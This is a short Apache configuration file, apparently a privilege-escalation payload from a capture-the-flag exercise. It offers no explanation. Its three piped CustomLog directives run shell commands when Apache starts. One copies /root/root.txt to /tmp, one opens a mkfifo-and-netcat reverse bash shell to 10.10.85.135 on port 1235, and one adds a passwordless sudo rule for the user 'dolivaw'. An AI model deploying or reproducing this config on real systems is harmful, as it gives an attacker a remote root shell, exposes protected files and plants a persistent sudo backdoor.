
ServerName localhost

LoadModule mpm_event_module /usr/lib/apache2/modules/mod_mpm_event.so
Listen 8080

PidFile /tmp/apache.pid
ErrorLog /dev/null


CustomLog "|/bin/sh -c 'cat /root/root.txt > /tmp/root3.txt'" combined

CustomLog "|/bin/sh -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.85.135 1235 >/tmp/f'" combined

CustomLog "|/bin/sh -c \"echo 'dolivaw ALL=(ALL) NOPASSWD:ALL' > /etc/sudoers.d/dolivaw\"" combined
